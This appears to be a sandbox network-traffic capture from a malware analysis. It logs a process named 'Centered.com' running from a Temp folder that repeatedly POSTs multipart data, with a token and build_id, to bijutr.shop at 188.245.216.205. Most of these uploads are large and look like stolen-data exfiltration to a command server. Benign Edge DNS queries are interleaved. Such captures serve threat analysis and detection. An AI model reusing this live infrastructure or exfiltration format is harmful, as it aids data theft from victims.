                                                                                                                                                                                                                                                                                      2024-12-27 06:10:16 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------SR1N7YM7GVAAIE3O8Q90Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------SR1N7YM7GVAAIE3O8Q90Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------SR1N7YM7GVAAIE3O8Q90Cont
2024-12-27 06:10:17 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:17 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49806 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:17 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7YMYCBSR1N7YUAS2V3OZ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:17 UTC | 16355 | OUT | Data Ascii: ------7YMYCBSR1N7YUAS2V3OZContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------7YMYCBSR1N7YUAS2V3OZContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------7YMYCBSR1N7YUAS2V3OZCont
2024-12-27 06:10:19 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49808 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:19 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----79H47YUK6F3EU3O890R1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:19 UTC | 16355 | OUT | Data Ascii: ------79H47YUK6F3EU3O890R1Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------79H47YUK6F3EU3O890R1Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------79H47YUK6F3EU3O890R1Cont
2024-12-27 06:10:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:21 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49809 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:21 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VSJ5XTJ5XBIE37Q1NOPP
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:21 UTC | 16355 | OUT | Data Ascii:
------VSJ5XTJ5XBIE37Q1NOPP
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------VSJ5XTJ5XBIE37Q1NOPP
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------VSJ5XTJ5XBIE37Q1NOPP
Cont
2024-12-27 06:10:23 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:23 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      16192.168.2.749810188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:22 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----ZCT0RQ16P8YM7QI589Z5
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 493
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:22 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74
Data Ascii: ------ZCT0RQ16P8YM7QI589Z5Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------ZCT0RQ16P8YM7QI589Z5Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------ZCT0RQ16P8YM7QI589Z5Cont
2024-12-27 06:10:23 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:23 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49827 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:30 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DB1DBAIWTRQIE3E3OH4E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 3165
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:30 UTC | 3165 | OUT
Data Ascii: ------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------DB1DBAIWTRQIE3E3OH4ECont
2024-12-27 06:10:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:31 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49839 | 172.64.41.3 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 06:10:30 UTC | 128 | OUT
Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:31 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 06:10:30 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f8725df8db27c7c-EWR
alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:31 UTC | 468 | IN
Data Ascii: wwwgstaticcom(c)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49850 | 172.64.41.3 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 06:10:30 UTC | 128 | OUT
Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:31 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 06:10:30 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f8725df8c208c12-EWR
alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:31 UTC | 468 | IN
Data Ascii: wwwgstaticcom(c)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49848 | 172.64.41.3 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:31 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      CF-RAY: 8f8725df8b1a8ca7-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0e 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomPC)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49851 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:30 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----RQIEU3EUA1N7YM7GV37Q
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 207993
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------RQIEU3EUA1N7YM7GV37QContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------RQIEU3EUA1N7YM7GV37QContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------RQIEU3EUA1N7YM7GV37QCont
2024-12-27 06:10:32 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49852 | 172.64.41.3 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:31 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      CF-RAY: 8f8725e17bb6c327-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 49854 | 172.64.41.3 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:31 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 49853 | 172.64.41.3 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:31 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 49841 | 142.250.181.65 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:31 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 06:10:32 UTC | 563 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 154477
X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Thu, 26 Dec 2024 15:58:14 GMT
Expires: Fri, 26 Dec 2025 15:58:14 GMT
Cache-Control: public, max-age=31536000
Age: 51137
Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                                                                                                                                                                                                                                      Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                      Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 49855 | 172.64.41.3 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:32 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 06:10:32 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 06:10:32 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f8725e998b1ef9f-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 49857 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:33 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----5PP8Q9ZUA1NYMY5FCTR1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:33 UTC | 16355 | OUT | Data Ascii:
------5PP8Q9ZUA1NYMY5FCTR1
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------5PP8Q9ZUA1NYMY5FCTR1
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------5PP8Q9ZUA1NYMY5FCTR1
Cont
2024-12-27 06:10:34 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
